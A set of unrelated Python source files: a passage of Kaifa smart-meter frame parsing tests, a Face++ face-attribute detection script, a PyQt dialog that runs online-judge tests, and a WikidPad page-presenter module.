        assert parsed.information.notification_body.list_items[4].index == 4
        assert parsed.information.notification_body.list_items[4].value == 0
        assert parsed.information.notification_body.list_items[5].index == 5
        assert parsed.information.notification_body.list_items[5].value == 0
        assert parsed.information.notification_body.list_items[6].index == 6
        assert parsed.information.notification_body.list_items[6].value == 435
        assert parsed.information.notification_body.list_items[7].index == 7
        assert parsed.information.notification_body.list_items[7].value == 33813
        assert parsed.information.notification_body.list_items[8].index == 8
        assert parsed.information.notification_body.list_items[8].value == 28103
        assert parsed.information.notification_body.list_items[9].index == 9
        assert parsed.information.notification_body.list_items[9].value == 18178
        assert parsed.information.notification_body.list_items[10].index == 10
        assert parsed.information.notification_body.list_items[10].value == 2168
        assert parsed.information.notification_body.list_items[11].index == 11
        assert parsed.information.notification_body.list_items[11].value == 0
        assert parsed.information.notification_body.list_items[12].index == 12
        assert parsed.information.notification_body.list_items[12].value == 2188

    def test_parse_no_list_3(self):
        """Parse NO list number 3."""
        parsed = kaifa.LlcPdu.parse(no_list_3)
        print(parsed)
        assert_apdu(parsed, 4194304, datetime(2020, 1, 25, 14, 0, 10))
        assert (
            parsed.information.notification_body.type
            == kaifa.KaifaBodyType.VALUE_ELEMENTS
        )
        assert parsed.information.notification_body.length == 18
        assert parsed.information.notification_body.list_items[0].index == 0
        assert parsed.information.notification_body.list_items[0].value == "KFM_001"
        assert parsed.information.notification_body.list_items[1].index == 1
        assert (
            parsed.information.notification_body.list_items[1].value
            == "6970631402614476"
        )
        assert parsed.information.notification_body.list_items[2].index == 2
        assert parsed.information.notification_body.list_items[2].value == "MA304H3E"
        assert parsed.information.notification_body.list_items[3].index == 3
        assert parsed.information.notification_body.list_items[3].value == 4904
        assert parsed.information.notification_body.list_items[4].index == 4
        assert parsed.information.notification_body.list_items[4].value == 0
        assert parsed.information.notification_body.list_items[5].index == 5
        assert parsed.information.notification_body.list_items[5].value == 0
        assert parsed.information.notification_body.list_items[6].index == 6
        assert parsed.information.notification_body.list_items[6].value == 377
        assert parsed.information.notification_body.list_items[7].index == 7
        assert parsed.information.notification_body.list_items[7].value == 14571
        assert parsed.information.notification_body.list_items[8].index == 8
        assert parsed.information.notification_body.list_items[8].value == 15643
        assert parsed.information.notification_body.list_items[9].index == 9
        assert parsed.information.notification_body.list_items[9].value == 9525
        assert parsed.information.notification_body.list_items[10].index == 10
        assert parsed.information.notification_body.list_items[10].value == 2193
        assert parsed.information.notification_body.list_items[11].index == 11
        assert parsed.information.notification_body.list_items[11].value == 0
        assert parsed.information.notification_body.list_items[12].index == 12
        assert parsed.information.notification_body.list_items[12].value == 2205
        # Item 13: embedded meter datetime (naive — no tz in NO frames).
        assert parsed.information.notification_body.list_items[13].index == 13
        assert parsed.information.notification_body.list_items[
            13
        ].value.datetime == datetime(2020, 1, 25, 14, 0, 10)
        # Items 14-17: cumulative energy registers.
        assert parsed.information.notification_body.list_items[14].index == 14
        assert parsed.information.notification_body.list_items[14].value == 79591144
        assert parsed.information.notification_body.list_items[15].index == 15
        assert parsed.information.notification_body.list_items[15].value == 0
        assert parsed.information.notification_body.list_items[16].index == 16
        assert parsed.information.notification_body.list_items[16].value == 889389
        assert parsed.information.notification_body.list_items[17].index == 17
        assert parsed.information.notification_body.list_items[17].value == 3210932
class TestDecodeKaifa:
    """Test decode Kaifa frames."""

    # NOTE(review): `kaifa` and the raw frame fixtures (se_list,
    # no_list_1..no_list_3) are expected to be defined at module level,
    # outside this excerpt -- confirm against the full test module.

    def test_decode_frame_se_list(self):
        """Decode SE list."""
        decoded = kaifa.decode_frame_content(se_list)
        pprint(decoded)
        # Decoded frame is a flat dict of meter readings keyed by OBIS-ish names.
        assert isinstance(decoded, dict)
        assert len(decoded) == 19
        assert decoded["active_power_export"] == 0
        assert decoded["active_power_export_total"] == 0
        assert decoded["active_power_import"] == 2816
        assert decoded["active_power_import_total"] == 4786979
        assert decoded["current_l1"] == 6.781
        assert decoded["current_l2"] == 0.79
        assert decoded["current_l3"] == 6.125
        assert decoded["list_ver_id"] == "KFM_001"
        # SE frames carry a timezone-aware timestamp (UTC+1 here).
        assert decoded["meter_datetime"] == datetime(
            2021, 9, 22, 17, 35, 30, tzinfo=timezone(timedelta(hours=1))
        )
        assert decoded["meter_id"] == "7340734073407340"
        assert decoded["meter_manufacturer"] == "Kaifa"
        assert decoded["meter_type"] == "MA304H4"
        assert decoded["reactive_power_export"] == 66
        assert decoded["reactive_power_export_total"] == 578528
        assert decoded["reactive_power_import"] == 0
        assert decoded["reactive_power_import_total"] == 26228
        assert decoded["voltage_l1"] == 232.2
        assert decoded["voltage_l2"] == 230.0
        assert decoded["voltage_l3"] == 228.9

    def test_decode_frame_no_list_1(self):
        """Decode NO list number 1."""
        decoded = kaifa.decode_frame_content(no_list_1)
        pprint(decoded)
        assert isinstance(decoded, dict)
        # List 1 is the minimal frame: only three fields.
        assert len(decoded) == 3
        assert decoded["active_power_import"] == 5852
        assert decoded["meter_datetime"] == datetime(2019, 2, 4, 23, 52, 22)
        assert decoded["meter_manufacturer"] == "Kaifa"

    def test_decode_frame_no_list_2(self):
        """Decode NO list number 2."""
        decoded = kaifa.decode_frame_content(no_list_2)
        pprint(decoded)
        assert isinstance(decoded, dict)
        assert len(decoded) == 15
        assert decoded["active_power_export"] == 0
        assert decoded["active_power_import"] == 9745
        assert decoded["current_l1"] == 33.813
        assert decoded["current_l2"] == 28.103
        assert decoded["current_l3"] == 18.178
        assert decoded["list_ver_id"] == "KFM_001"
        assert decoded["meter_datetime"] == datetime(2020, 1, 25, 13, 9, 30)
        assert decoded["meter_manufacturer"] == "Kaifa"
        assert decoded["meter_type"] == "MA304H3E"
        assert decoded["reactive_power_export"] == 435
        assert decoded["reactive_power_import"] == 0
        assert decoded["voltage_l1"] == 216.8
        assert decoded["voltage_l2"] == 0.0
        assert decoded["voltage_l3"] == 218.8

    def test_decode_frame_no_list_3(self):
        """Decode NO list number 3."""
        decoded = kaifa.decode_frame_content(no_list_3)
        pprint(decoded)
        assert isinstance(decoded, dict)
        # List 3 is the full frame including meter id and energy totals.
        assert len(decoded) == 19
        assert decoded["active_power_export"] == 0
        assert decoded["active_power_export_total"] == 0
        assert decoded["active_power_import"] == 4904
        assert decoded["active_power_import_total"] == 79591144
        assert decoded["current_l1"] == 14.571
        assert decoded["current_l2"] == 15.643
        assert decoded["current_l3"] == 9.525
        assert decoded["list_ver_id"] == "KFM_001"
        assert decoded["meter_datetime"] == datetime(2020, 1, 25, 14, 0, 10)
        assert decoded["meter_id"] == "6970631402614476"
        assert decoded["meter_manufacturer"] == "Kaifa"
        assert decoded["meter_type"] == "MA304H3E"
        assert decoded["reactive_power_export"] == 377
        assert decoded["reactive_power_export_total"] == 3210932
        assert decoded["reactive_power_import"] == 0
        assert decoded["reactive_power_import_total"] == 889389
        assert decoded["voltage_l1"] == 219.3
        assert decoded["voltage_l2"] == 0.0
        assert decoded["voltage_l3"] == 220.5
|
import requests
import json
from PIL import Image, ImageDraw
# https://console.faceplusplus.com.cn/documents/4888373
#调用旷视科技的人脸识别api,返回人脸的属性
def face_detect(filepath):
    """Call the Face++ (Megvii) detect API and describe each detected face.

    API reference: https://console.faceplusplus.com.cn/documents/4888373

    Args:
        filepath: Path to a local image file to upload.

    Returns:
        str: A Chinese-language summary (gender / beauty score / age /
        emotion) for every detected face, or an error / "no face" message.
    """
    http_url = 'https://api-cn.faceplusplus.com/facepp/v3/detect'
    key = '<KEY>'
    secret = '<KEY>'
    data = {
        'api_key': key,
        'api_secret': secret,
        'return_landmark': '0',
        'return_attributes':
            'gender,age,beauty,ethnicity,emotion,mouthstatus,skinstatus',
    }
    # Open the image in a context manager so the handle is always closed
    # (the original code leaked the open file object).
    with open(filepath, 'rb') as image_file:
        response = requests.post(http_url, data=data,
                                 files={'image_file': image_file})
    resp_dict = response.json()

    # Check for an API error *before* touching 'faces': that key is absent
    # on error responses, so the original evaluation order raised KeyError.
    if 'error_message' in resp_dict:
        return '抱歉,服务器出现错误'

    num = len(resp_dict['faces'])
    if num == 0:
        return '你的脸在哪里~~'

    # Map API enum values to user-facing messages (dict dispatch instead of
    # the original if/elif chains). 'surprise' falls through to the default.
    emotion_msgs = {
        'anger': '你看起来有点生气哦~~',
        'disgust': '你好像看到什么厌恶的东西了哦~~',
        'fear': '你好像有点恐惧~~',
        'happiness': '你看起来很开心哦~~',
        'neutral': '你看起来很平静~~',
        'sadness': '你看起来有点伤心哦~~',
    }

    ans = ''
    described = 0  # faces whose attributes were present in the response
    for face in resp_dict['faces']:
        if 'attributes' not in face:
            continue
        attrs = face['attributes']
        gender = '男' if attrs['gender']['value'] == 'Male' else '女'
        # BUG FIX: pick the beauty score matching the detected gender; the
        # original always read male_score. The +18 offset is kept from the
        # original scoring tweak so the >100 "爆表" threshold still works.
        score_key = 'male_score' if gender == '男' else 'female_score'
        beauty = attrs['beauty'][score_key] + 18
        age = attrs['age']['value']
        emotion = attrs['emotion']
        # Dominant emotion = the confidence key with the highest value.
        emotion_d = emotion_msgs.get(max(emotion, key=emotion.get),
                                     '你看起来有点惊讶哦~~')
        described += 1
        if beauty > 100:
            beauty_text = ('帅哥,你的颜值爆表了~~' if gender == '男'
                           else '美女,你的颜值爆表了~~')
        else:
            beauty_text = str(beauty)
        ans += ('\n-------\n' + '性别: ' + str(gender) + '\n' +
                '颜值: ' + beauty_text + '\n' +
                '年龄: ' + str(age) + '\n' + '情绪: ' + emotion_d)

    if described == num:
        return '照片上有' + str(num) + '个人' + ans
    return ('照片上有' + str(num) + '个人,但是有' + str(num - described) +
            '个人脸属性无法判断' + ans)
if __name__ == '__main__':
    # Ad-hoc manual check: run detection on a sample photo and print the result.
    sample_path = '/home/lk/python_web/WeRoBot-master/pic/22334559737202962.jpg'
    print(face_detect(sample_path))
|
import subprocess
from PyQt5 import QtWidgets
from rujaion import util
class TestDialog(QtWidgets.QDialog):
    """Dialog for configuring limits and running ``oj test`` on a binary."""

    def __init__(self, *args, compiled_file: str, settings):
        """Build the dialog.

        Args:
            compiled_file: Path handed to ``oj test -c``.
            settings: persistent store backing the StateFull* widgets
                (presumably QSettings-like -- confirm in rujaion.util).
        """
        super().__init__(*args)
        # Console of the parent window; oj output is echoed there.
        self.console = self.parent().console
        self.compiled_file = compiled_file
        # self.is_interactive = util.StateFullCheckBox(settings, "TEST_INTERACTIVE", self)
        self.tle_edit = util.StateFullTextEdit(settings, "TEST_TLE", self, "2.0")
        self.mle_edit = util.StateFullTextEdit(settings, "TEST_MLE", self, "1024")
        self.float_error_edit = util.StateFullTextEdit(
            settings, "TEST_FLOAT_ERROR", self
        )
        # (label, widget) rows; a None widget marks the start of a group box.
        self.dialogs = (
            ("Submit...", None),
            ("TLE", self.tle_edit),
            ("MLE", self.mle_edit),
            ("FLOAT ERROR", self.float_error_edit),
        )
        self.draw()

    def draw(self, *args):
        """Lay out the group box, the option rows and the Test button."""
        main_layout = QtWidgets.QVBoxLayout()
        for name, widget in self.dialogs:
            if not widget:
                # A None widget opens a new styled group box; subsequent
                # rows are appended to its form layout.
                l_widget = QtWidgets.QGroupBox(name)
                l_widget.setStyleSheet(
                    """
                    QGroupBox {
                        color: white;
                        border: 1px solid gray;
                        border-radius: 9px;
                        margin-top: 0.5em;
                    }
                    QGroupBox::title {
                        color: white;
                        subcontrol-origin: margin;
                        left: 10px;
                        padding: 0 3px 0 3px;
                    }
                    """
                )
                l_widget.setFlat(False)
                section_layout = QtWidgets.QFormLayout()
                l_widget.setLayout(section_layout)
                main_layout.addWidget(l_widget)
            else:
                section_layout.addRow(name, widget)
        test_button = QtWidgets.QPushButton("Test")
        test_button.clicked.connect(self.test)
        main_layout.addWidget(test_button)
        self.setLayout(main_layout)

    def test(self):
        """Persist option values, record the page URL and run ``oj test``."""
        for name, widget in self.dialogs:
            try:
                widget.commit()
            except AttributeError:
                # Group-box separators have widget=None and no commit().
                pass
        self.parent().recorder.push(
            self.parent().browser_widget.browser.url().toString(), "test"
        )
        try:
            # Only pass limit flags that the user actually filled in.
            command = ["oj", "test", "-c", self.compiled_file]
            if self.float_error_edit.text():
                command += ["-e", str(self.float_error_edit.text())]
            if self.tle_edit.text():
                command += ["--tle", str(self.tle_edit.text())]
            if self.mle_edit.text():
                command += ["--mle", str(self.mle_edit.text())]
            out = subprocess.check_output(
                command, stderr=subprocess.STDOUT, timeout=4.0
            ).decode()
            self.console.writeLnSignal.emit(out)
        except subprocess.TimeoutExpired as e:
            # NOTE(review): e.output is bytes (not decoded) here -- confirm
            # the console signal accepts bytes as well as str.
            self.console.writeLnSignal.emit(e.output)
            self.console.writeLnSignal.emit("[-] Test is Timeout")
        except subprocess.CalledProcessError as e:
            self.console.writeLnSignal.emit(e.output)
        self.close()
class TestReactiveDialog(QtWidgets.QDialog):
    """Dialog for running ``oj t/r`` (reactive/interactive test) with a judge."""

    def __init__(self, *args, compiled_file: str, settings):
        """Build the dialog.

        Args:
            compiled_file: Path handed to ``oj t/r -c``.
            settings: persistent store backing the judge-command edit.
        """
        super().__init__(*args)
        # Console of the parent window; oj output is echoed there.
        self.console = self.parent().console
        self.compiled_file = compiled_file
        self.judge_command = util.StateFullTextEdit(
            settings, "TEST_COMMAND", self, "./judge"
        )
        # (label, widget) rows; a None widget marks the start of a group box.
        self.dialogs = (("Submit...", None), ("JUDGE COMMAND", self.judge_command))
        self.draw()

    def draw(self, *args):
        """Lay out the group box, the judge-command row and the Test button."""
        main_layout = QtWidgets.QVBoxLayout()
        for name, widget in self.dialogs:
            if not widget:
                # A None widget opens a new styled group box; subsequent
                # rows are appended to its form layout.
                l_widget = QtWidgets.QGroupBox(name)
                l_widget.setStyleSheet(
                    """
                    QGroupBox {
                        color: white;
                        border: 1px solid gray;
                        border-radius: 9px;
                        margin-top: 0.5em;
                    }
                    QGroupBox::title {
                        color: white;
                        subcontrol-origin: margin;
                        left: 10px;
                        padding: 0 3px 0 3px;
                    }
                    """
                )
                l_widget.setFlat(False)
                section_layout = QtWidgets.QFormLayout()
                l_widget.setLayout(section_layout)
                main_layout.addWidget(l_widget)
            else:
                section_layout.addRow(name, widget)
        test_button = QtWidgets.QPushButton("Test")
        test_button.clicked.connect(self.test)
        main_layout.addWidget(test_button)
        self.setLayout(main_layout)

    def test(self):
        """Persist the judge command and run ``oj t/r`` against it."""
        for name, widget in self.dialogs:
            try:
                widget.commit()
            except AttributeError:
                # Group-box separators have widget=None and no commit().
                pass
        try:
            # "t/r" is presumably oj's test/reactive subcommand alias --
            # confirm against online-judge-tools documentation.
            command = ["oj", "t/r", "-c", self.compiled_file, self.judge_command.text()]
            out = subprocess.check_output(
                command, stderr=subprocess.STDOUT, timeout=4.0
            ).decode()
            self.console.writeLnSignal.emit(out)
        except subprocess.TimeoutExpired as e:
            # NOTE(review): e.output is bytes (not decoded) here -- confirm
            # the console signal accepts bytes as well as str.
            self.console.writeLnSignal.emit(e.output)
            self.console.writeLnSignal.emit("[-] Test is Timeout")
        except subprocess.CalledProcessError as e:
            self.console.writeLnSignal.emit(e.output)
        self.close()
|
<filename>lib/pwiki/DocPagePresenter.py<gh_stars>10-100
## import hotshot
## _prof = hotshot.Profile("hotshot.prf")
import traceback
import wx
import wx.xrc as xrc
from WikiExceptions import *
from wxHelper import getAccelPairFromKeyDown, copyTextToClipboard, GUI_ID
from .MiscEvent import ProxyMiscEvent # , KeyFunctionSink
from .WikiHtmlView import createWikiHtmlView
from . import DocPages
from . import SystemInfo
from .StringOps import uniToGui, escapeForIni, unescapeForIni
from .WindowLayout import LayeredControlPresenter, LayerSizer, StorablePerspective
from .PageHistory import PageHistory
from . import pygauge as PG
class BasicDocPagePresenter(LayeredControlPresenter):
    """
    Controls the group of all widgets (subcontrols) used to present/edit
    a particular doc page, currently only the WikiTxtCtrl (subcontrol name
    "textedit") and WikiHtmlView or WikiHtmlViewIE (name "preview").
    This version isn't itself a wx panel and is mainly thought for
    controlling e.g. a notebook which has the actual subcontrols as
    children
    """
    # NOTE(review): this module is Python 2 (``except ..., e`` syntax,
    # u"" literals, iteritems elsewhere in the file).

    def __init__(self, mainControl):
        LayeredControlPresenter.__init__(self)
        self.mainControl = mainControl
        # Currently presented DocPage (None until a page is opened).
        self.docPage = None
        # Proxy that re-broadcasts events of whichever page is current.
        self.currentDocPageProxyEvent = ProxyMiscEvent(self)
        self.currentDocPageProxyEvent.addListener(self)
        # Connect page history
        self.pageHistory = PageHistory(self.getMainControl(), self)
        self.getMainControl().getMiscEvent().addListener(self)

    def getMainControl(self):
        """Return the owning main application frame/control."""
        return self.mainControl

    def getConfig(self):
        """Return the application configuration object."""
        return self.getMainControl().getConfig()

    def getDefaultFontFaces(self):
        """Return the default font faces from the presentation extension."""
        return self.getMainControl().presentationExt.faces

    def getWikiDocument(self):
        """Return the currently open wiki document."""
        return self.getMainControl().getWikiDocument()

    def getPageHistory(self):
        """Return this presenter's PageHistory instance."""
        return self.pageHistory

    def getActiveEditor(self):
        """
        For compatibility with older scripts.
        """
        return self.getSubControl("textedit")

    def SetStatusText(self, text, field):
        """Set status bar *field* to *text* (GUI-encoded)."""
        self.getStatusBar().SetStatusText(uniToGui(text), field)

    def showStatusMessage(self, msg, duration=0, key=None):
        """Delegate a transient status message to the main control."""
        self.getMainControl().showStatusMessage(msg, duration, key)

    def isCurrent(self):
        """True iff this presenter is the main control's current one."""
        return self.getMainControl().getCurrentDocPagePresenter() is self

    def makeCurrent(self):
        """Ask the main area panel to make this the current presenter."""
        self.mainControl.getMainAreaPanel().prepareCurrentPresenter(self)

    def close(self):
        """Detach listeners and release the current page on shutdown."""
        LayeredControlPresenter.close(self)
        self.getMainControl().getMiscEvent().removeListener(self)
        self.pageHistory.close()
        self.setDocPage(None)  # TODO: Was commented out?

    def getDocPage(self):
        """Return the currently presented DocPage (or None)."""
        return self.docPage

    def setDocPage(self, dp):
        """Set the current DocPage and repoint the proxy event at it."""
        self.docPage = dp
        self.currentDocPageProxyEvent.setWatchedSource(dp)

    def getCurrentDocPageProxyEvent(self):
        """
        This ProxyMiscEvent resends any messsages from the currently
        active DocPage
        """
        return self.currentDocPageProxyEvent

    def getWikiWord(self):
        """Return the wiki word of the current page, or None for non-wiki pages."""
        docPage = self.getDocPage()
        if docPage is None or not isinstance(docPage,
                (DocPages.WikiPage, DocPages.AliasWikiPage)):
            return None
        return docPage.getWikiWord()

    def getUnifiedPageName(self):
        """Return the unified page name of the current page, or None."""
        docPage = self.getDocPage()
        if docPage is None:
            return None
        return docPage.getUnifiedPageName()

    def getLiveText(self):
        """Return the live (possibly unsaved) text of the current page, or None."""
        docPage = self.getDocPage()
        if docPage is None:
            return None
        return docPage.getLiveText()

    def informEditorTextChanged(self, changer):
        """
        Called by the txt editor control
        """
        if self.getDocPage() is not None:
            self.getDocPage().informEditorTextChanged(changer)
        self.fireMiscEventProps({"changed editor text": True,
                "changed live text": True, "changer": changer})

    def miscEventHappened(self, miscevt):
        """
        Handle misc events
        """
        if miscevt.getSource() is self.getMainControl():
            # TODO? Check if mainControl's current presenter is this one
            self.fireMiscEventProps(miscevt.getProps())
        elif miscevt.getSource() is self.docPage:
            # if miscevt.has_key("changed editor text"):
            #     self.fireMiscEventProps(miscevt.getProps())
            # elif miscevt.has_key("deleted page"):
            #     self.pageHistory.goAfterDeletion()
            if miscevt.has_key("renamed wiki page"):
                # Reload under the new name after a rename.
                # oldWord = self.docPage.getWikiWord()
                newWord = miscevt.get("newWord")
                self.getSubControl("textedit").loadWikiPage(None)
                self.openWikiPage(newWord, forceTreeSyncFromRoot=False)

    def getStatusBar(self):
        """Return the main frame's wx status bar."""
        return self.getMainControl().GetStatusBar()

    def openDocPage(self, unifiedPageName, *args, **kwargs):
        """
        Open a doc page identified by its unified page name
        """
        if len(unifiedPageName) == 0:
            return
        # "wikipage/<word>" names are wiki pages, anything else functional pages.
        if unifiedPageName.startswith(u"wikipage/"):
            self.openWikiPage(unifiedPageName[9:], *args, **kwargs)
        else:
            self.openFuncPage(unifiedPageName, *args, **kwargs)

    def openFuncPage(self, funcTag, addToHistory=True, **evtprops):
        """Open a functional (non-wiki) page identified by *funcTag*."""
        if not self.getMainControl().requireReadAccess():
            return
        oldPage = self.getDocPage()
        evtprops["addToHistory"] = addToHistory
        try:
            page = self.getMainControl().getWikiDocument().getFuncPage(funcTag)
            self.getSubControl("textedit").loadFuncPage(page, evtprops)
        except (IOError, OSError, DbAccessError), e:
            # Database/file access failed: notify main control, then re-raise.
            self.getMainControl().lostAccess(e)
            raise
        self.switchSubControl("textedit")
        p2 = evtprops.copy()
        p2.update({"loaded current doc page": True,
                "loaded current functional page": True,
                "docPage": page,
                "oldDocPage": oldPage})
        # p2.update({"loaded current page": True})
        self.fireMiscEventProps(p2)
        page.informVisited()

    def openWikiPage(self, wikiWord, addToHistory=True,
            forceTreeSyncFromRoot=False, forceReopen=False,
            suggNewPageTitle=None, **evtprops):
        """
        Opens a wiki page in the editor of this presenter
        """
        if not self.getMainControl().requireReadAccess():
            return
        # oldPage = self.getDocPage()
        evtprops["addToHistory"] = addToHistory
        evtprops["forceTreeSyncFromRoot"] = forceTreeSyncFromRoot
        langHelper = wx.GetApp().createWikiLanguageHelper(
                self.getWikiDocument().getWikiDefaultWikiLanguage())
        errMsg = None
        # The "if" ensures that existing pages can be opened even
        # if the syntax is (or became) incompatible
        if not self.getWikiDocument().isDefinedWikiPageName(wikiWord):
            errMsg = langHelper.checkForInvalidWikiWord(wikiWord,
                    self.getWikiDocument())
        if errMsg is not None:
            self.getMainControl().displayErrorMessage(
                    _(u"'%s' is an invalid wiki word. %s.") % (wikiWord, errMsg))
            return
        try:
            # don't reopen the currently open page, only send an event
            if (wikiWord == self.getWikiWord()) and not forceReopen:
                p2 = evtprops.copy()
                p2.update({"reloaded current doc page": True,
                        "reloaded current wiki page": True})
                self.fireMiscEventProps(p2)
                if forceTreeSyncFromRoot:
                    self.getMainControl().findCurrentWordInTree()
                return
            # trigger hook
            self.getMainControl().hooks.openWikiWord(self, wikiWord)
            # check if this is an alias
            wikiDoc = self.getMainControl().getWikiDocument()
            wikiWord = wikiDoc.getWikiPageNameForLinkTermOrAsIs(wikiWord)
            # fetch the page info from the database
            try:
                page = wikiDoc.getWikiPage(wikiWord)
                # self.getStatusBar().SetStatusText(uniToGui(_(u"Opened wiki word '%s'") %
                #         wikiWord), 0)
            except (WikiWordNotFoundException, WikiFileNotFoundException), e:
                # Unknown word: create a fresh page instead.
                page = wikiDoc.createWikiPage(wikiWord,
                        suggNewPageTitle=suggNewPageTitle)
                # trigger hooks
                self.getMainControl().hooks.newWikiWord(self, wikiWord)
                self.showStatusMessage(
                        uniToGui(_(u"Wiki page not found, a new "
                        u"page will be created")))
                # self.getStatusBar().SetStatusText(uniToGui(u""), 1)
            self.loadWikiPage(page, **evtprops)
            page.informVisited()
            # sync the tree
            if forceTreeSyncFromRoot:
                self.getMainControl().findCurrentWordInTree()  # TODO ?
        except (IOError, OSError, DbAccessError), e:
            self.getMainControl().lostAccess(e)
            raise
        # trigger hook
        self.getMainControl().hooks.openedWikiWord(self, wikiWord)

    def loadWikiPage(self, page, **evtprops):
        """Load *page* into the text editor and fire the page-loaded events."""
        oldPage = self.getDocPage()  # TODO Test if too late to retrieve old page here
        self.getSubControl("textedit").loadWikiPage(page, evtprops)
        self.getMainControl().refreshPageStatus()  # page)
        p2 = evtprops.copy()
        p2.update({"loaded current doc page": True,
                "loaded current wiki page": True,
                "docPage": page,
                "oldDocPage": oldPage})
        self.fireMiscEventProps(p2)
        self.getMainControl().getMainAreaPanel().updateConfig()
        # Should the page by default be presented in editor or preview mode?
        pv = page.getAttributeOrGlobal(u"view_pane")
        if pv is not None:
            pv = pv.lower()
            if pv == u"preview":
                self.switchSubControl("preview")
            elif pv == u"editor":
                self.switchSubControl("textedit")
            # else: do nothing (pv == u"off")

    def saveCurrentDocPage(self, force = False):
        """Save the current page if dirty (or *force*) and write access is granted."""
        ## _prof.start()
        if (force or self.getDocPage().getDirty()[0]) and \
                self.getMainControl().requireWriteAccess():
            # Reset error flag here, it can be set true again by saveDocPage
            # self.getWikiDocument().setNoAutoSaveFlag(False)
            try:
                # this calls in turn saveDocPage() in PersonalWikiFrame
                self.getSubControl("textedit").saveLoadedDocPage()
            except (IOError, OSError, DbAccessError), e:
                self.getMainControl().lostAccess(e)
                raise
        self.getMainControl().refreshPageStatus()
        ## _prof.stop()

    def stdDialog(self, dlgtype, title, message, additional=None):
        """
        Show message dialogs, used for scripts.
        Calls same function from PersonalWikiFrame.
        """
        return self.mainControl.stdDialog(dlgtype, title, message, additional)

    def displayMessage(self, title, str):
        """pops up a dialog box,
        used by scripts only
        """
        self.mainControl.displayMessage(title, str)

    def displayErrorMessage(self, errorStr, e=u""):
        """Delegate error display to the main control."""
        self.mainControl.displayErrorMessage(errorStr, e)
class DocPagePresenter(wx.Panel, BasicDocPagePresenter, StorablePerspective):
    """
    Controls the group of all widgets (subcontrols) used to present/edit
    a particular doc page, currently only WikiTxtCtrl and WikiHtmlView.
    This version is a panel and contains the children itself.
    """
    def __init__(self, parent, mainControl, id=-1):
        wx.Panel.__init__(self, parent, id, style=wx.WANTS_CHARS)
        BasicDocPagePresenter.__init__(self, mainControl)
        self.SetSizer(LayerSizer())
        res = xrc.XmlResource.Get()
        self.tabContextMenu = res.LoadMenu("MenuDocPagePresenterTabPopup")
        self.mainTreePositionHint = None  # The tree ctrl uses this to remember
                # which element was selected if same page appears multiple
                # times in tree. DocPagePresenter class itself does not modify it.
        # Lazily created PyGauge shown inside the tab; progress state per thread key.
        self.tabProgressBar = None
        self.tabProgressCount = {}
        wx.GetApp().getMiscEvent().addListener(self)
        # Menu-command bindings for page history navigation.
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST,
                lambda evt: self.viewPageHistory())
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST_UP,
                lambda evt: self.viewPageHistory(-1))
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_LIST_DOWN,
                lambda evt: self.viewPageHistory(1))
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_GO_BACK,
                lambda evt: self.pageHistory.goInHistory(-1))
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_HISTORY_GO_FORWARD,
                lambda evt: self.pageHistory.goInHistory(1))
        wx.EVT_MENU(self, GUI_ID.CMD_PAGE_GO_UPWARD_FROM_SUBPAGE,
                lambda evt: self.goUpwardFromSubpage())

    def close(self):
        """Detach the app-level listener, then run base-class shutdown."""
        wx.GetApp().getMiscEvent().removeListener(self)
        BasicDocPagePresenter.close(self)

    def setSubControl(self, scName, sc):
        """Replace subcontrol *scName* with *sc*, closing any previous one."""
        oldSc = self.getSubControl(scName)
        if oldSc is not None:
            self.GetSizer().Detach(oldSc)
            oldSc.close()
        BasicDocPagePresenter.setSubControl(self, scName, sc)
        if sc is not None:
            self.GetSizer().Add(sc)
            self.Layout()

    def switchSubControl(self, scName, gainFocus=False):
        """
        Make the chosen subcontrol visible, all other invisible
        """
        try:
            subControl = self.subControls[scName]
        except KeyError:
            traceback.print_exc()
            return
        # First show subControl scName, then hide the others
        # to avoid flicker
        if self.visible and self.lastVisibleCtrlName != scName:
            subControl.setLayerVisible(True)
        subControl.Show(True)
        if gainFocus:
            subControl.SetFocus()
        for n, c in self.subControls.iteritems():
            # if n != scName:
            if c is not subControl:
                if self.visible:
                    c.setLayerVisible(False)
                c.Show(False)
        self.lastVisibleCtrlName = scName
        self.setTitle(self.shortTitle)  # ?

    # Platform-dependent SetFocus: on Linux the focus change must be
    # deferred with wx.CallAfter to take effect reliably.
    if SystemInfo.isLinux():
        def SetFocus(self):
            try:
                ctrl = self.subControls[self.lastVisibleCtrlName]
                wx.CallAfter(ctrl.SetFocus)
            except KeyError:
                wx.Panel.SetFocus(self)
    else:
        def SetFocus(self):
            try:
                self.subControls[self.lastVisibleCtrlName].SetFocus()
            except KeyError:
                wx.Panel.SetFocus(self)

    def viewPageHistory(self, posDelta=0):
        """Show the page-history chooser dialog and jump to the selection."""
        if not self.getMainControl().requireReadAccess():
            return
        try:
            hist = self.pageHistory.getHrHistoryList()
            histpos = self.pageHistory.getPosition()
        except (IOError, OSError, DbAccessError), e:
            self.getMainControl().lostAccess(e)
            raise
        historyLen = len(hist)
        dlg = wx.SingleChoiceDialog(self,
                _(u"History"),
                _(u"History"),
                hist,
                wx.CHOICEDLG_STYLE | wx.OK | wx.CANCEL)
        if historyLen > 0:
            # Preselect current position shifted by posDelta, clamped to range.
            position = histpos + posDelta - 1
            if (position < 0):
                position = 0
            elif (position >= historyLen):
                position = historyLen-1
            dlg.SetSelection(position)
        if dlg.ShowModal() == wx.ID_OK and dlg.GetSelection() > -1:
            self.pageHistory.goInHistory(dlg.GetSelection() - (histpos - 1))
        dlg.Destroy()

    def goUpwardFromSubpage(self):
        """Navigate from the current subpage to its parent page, if any."""
        wikiWord = self.getWikiWord()
        if wikiWord is None:
            return
        langHelper = wx.GetApp().createWikiLanguageHelper(
                self.getWikiDocument().getWikiDefaultWikiLanguage())
        wikiPath = langHelper.createWikiLinkPathObject(pageName=wikiWord)
        wikiPath.join(langHelper.createWikiLinkPathObject(upwardCount=1))
        upwardPageName = wikiPath.resolveWikiWord(None)
        if not upwardPageName or wikiWord == upwardPageName:
            # No way upward
            # TODO: Maybe alternative reaction?
            return
        # motion type "parent" isn't exactly right but a good guess
        self.openWikiPage(upwardPageName, motionType="parent")

    def getTabContextMenu(self):
        """Return the context menu shown for this presenter's tab."""
        return self.tabContextMenu

    def setTitle(self, shortTitle):
        """Set the tab title, truncating the middle if it exceeds the config limit."""
        LayeredControlPresenter.setTitle(self, shortTitle)
        # Shorten title if too long
